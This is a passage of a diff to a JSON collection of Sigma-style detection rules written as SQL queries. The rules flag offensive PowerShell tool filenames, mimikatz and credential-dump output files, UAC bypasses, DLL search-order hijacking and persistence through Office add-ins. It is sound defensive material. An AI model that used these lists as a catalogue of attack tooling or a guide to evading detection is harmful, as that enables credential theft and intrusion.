OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Powermad.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\'))" ], - "filename": "win_security_aadhealth_mon_agent_regkey_access.yml" + "filename": "file_event_win_powershell_exploit_scripts.yml" }, { - "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", - "id": "8400629e-79a9-4737-b387-5db940ab2367", + "title": "Octopus Scanner Malware", + "id": "805c55d9-31e6-4846-9878-c34c75054fe9", "status": "test", - "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", - "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", + "description": "Detects Octopus Scanner Malware.", + "author": "NVISO", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.t1195", + "attack.t1195.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\')" ], - "filename": "win_security_rdp_bluekeep_poc_scanner.yml" + "filename": "file_event_win_mal_octopus_scanner.yml" }, { - "title": "Password Protected ZIP File Opened", - "id": "00ba9da1-b510-4f6b-b258-8d338836180f", + "title": "Potential Initial Access via DLL Search Order Hijacking", + "id": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", + "author": "Tim Rauch (rule), Elastic (idea)", + "tags": [ + "attack.t1566", + "attack.t1566.001", + "attack.initial_access", + "attack.t1574", + "attack.t1574.001", + "attack.defense_evasion" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\') AND NOT (TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSPUB.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\api-ms-win-core-%' ESCAPE '\\'))" ], - "filename": "win_security_susp_opened_encrypted_zip.yml" + "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml" }, { - "title": "DCERPC SMB Spoolss Named Pipe", - "id": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", - "status": "test", - "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", - "author": "OTR (Open Threat Research)", + "title": "Suspicious LNK Double Extension Files", + "id": "3215aa19-f060-4332-86d5-5602511f3ca8", + "status": "experimental", + "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Domain Controllers acting as printer servers too? :)" + "Users creating a shortcut on e.g. desktop" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.lnk' ESCAPE '\\' AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\PowerPoint%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word%' ESCAPE '\\')))" ], - "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml" + "filename": "file_event_win_susp_lnk_double_extension.yml" }, { - "title": "Local User Creation", - "id": "66b6be3d-55d0-4f47-9855-d69df21740ea", - "status": "test", - "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your windows server logs and not on your DC logs.", - "author": "Patrick Bareiss", + "title": "Potential RipZip Attack on Startup Folder", + "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "status": "experimental", + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", + "author": "Greg (rule)", "tags": [ "attack.persistence", - "attack.t1136.001" + "attack.t1547" ], "falsepositives": [ - "Domain Controller Logs", - "Local accounts managed by privileged account management tools" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "win_security_user_creation.yml" + "filename": "file_event_win_ripzip_attack.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", - "id": "8fe1c584-ee61-444b-be21-e9054b229694", - "status": "experimental", - "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", - "author": "INIT_6", + "title": "Potential Persistence Via Microsoft Office Add-In", + "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", + "status": "test", + "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", + "author": "NVISO", "tags": [ - "attack.execution", - "attack.t1569", - "cve.2021.1675", - "cve.2021.34527" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Unknown" + "Legitimate add-ins" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\')))" ], - "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" + "filename": "file_event_win_office_addin_persistence.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - Security", - "id": "dcf2db1f-f091-425b-a821-c05875b8925a", + "title": "Creation of a Diagcab", + "id": "3d0ed417-3d94-4963-a562-4a92c940656a", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.resource_development" ], "falsepositives": [ - "Unknown" + "Legitimate microsoft diagcab" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%.diagcab' ESCAPE '\\'" ], - "filename": "win_security_invoke_obfuscation_var_services_security.yml" + "filename": "file_event_win_susp_diagcab.yml" }, { - "title": "Service Installed By Unusual Client - Security", - "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", - "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "title": "UAC Bypass Using Windows Media Player - File", + "id": "68578b43-65df-4f81-9a9b-92f32711a951", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1543" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\'))" ], - "filename": "win_security_service_installation_by_unusal_client.yml" + "filename": "file_event_win_uac_bypass_wmp.yml" }, { - "title": "Outgoing Logon with New Credentials", - "id": "def8b624-e08f-4ae1-8612-1ba21190da6b", + "title": "Office Template Creation", + "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", "status": "experimental", - "description": "Detects logon events that specify new credentials", + "description": "Detects creation of template files for Microsoft Office from outside Office", "author": "Max Altgelt (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1137" + ], "falsepositives": [ - "Legitimate remote administration activity" + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9')" + "SELECT * FROM logs WHERE ((((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_logon_newcredentials.yml" + "filename": "file_event_win_word_template_creation.yml" }, { - "title": "SAM Registry Hive Handle Request", - "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "title": "Mimikatz Kirbi File Creation", + "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", "status": "test", - "description": "Detects handles requested to SAM registry hive", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", + "author": "Florian Roth (Nextron Systems), David ANDRE", "tags": [ - "attack.discovery", - "attack.t1012", "attack.credential_access", - "attack.t1552.002" + "attack.t1558" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\')" ], - "filename": "win_security_sam_registry_hive_handle_request.yml" + "filename": "file_event_win_hktl_mimikatz_files.yml" }, { - "title": "Possible DC Shadow Attack", - "id": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", + "title": "Legitimate Application Dropped Executable", + "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", "status": "experimental", - "description": "Detects DCShadow via create new SPN", - "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", + "description": "Detects programs on a Windows system that should not write executables to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1207" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Valid on domain controllers; exclude known DCs" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4742' AND ServicePrincipalNames LIKE '%GC/%' ESCAPE '\\') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'servicePrincipalName' AND AttributeValue LIKE 'GC/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "win_security_possible_dc_shadow.yml" + "filename": "file_event_win_legitimate_app_dropping_exe.yml" }, { - "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", - "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "title": "UAC Bypass Abusing Winsat Path Parsing - File", + "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", "status": "test", - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" ], - "filename": "win_security_dcom_iertutil_dll_hijack.yml" + "filename": "file_event_win_uac_bypass_winsat.yml" }, { - "title": "Kerberos Manipulation", - "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "title": "Cred Dump Tools Dropped Files", + "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", "status": "test", - "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", - "author": "Florian Roth (Nextron Systems)", + "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ "attack.credential_access", - "attack.t1212" + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Faulty legacy applications" + "Legitimate Administrator using tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE 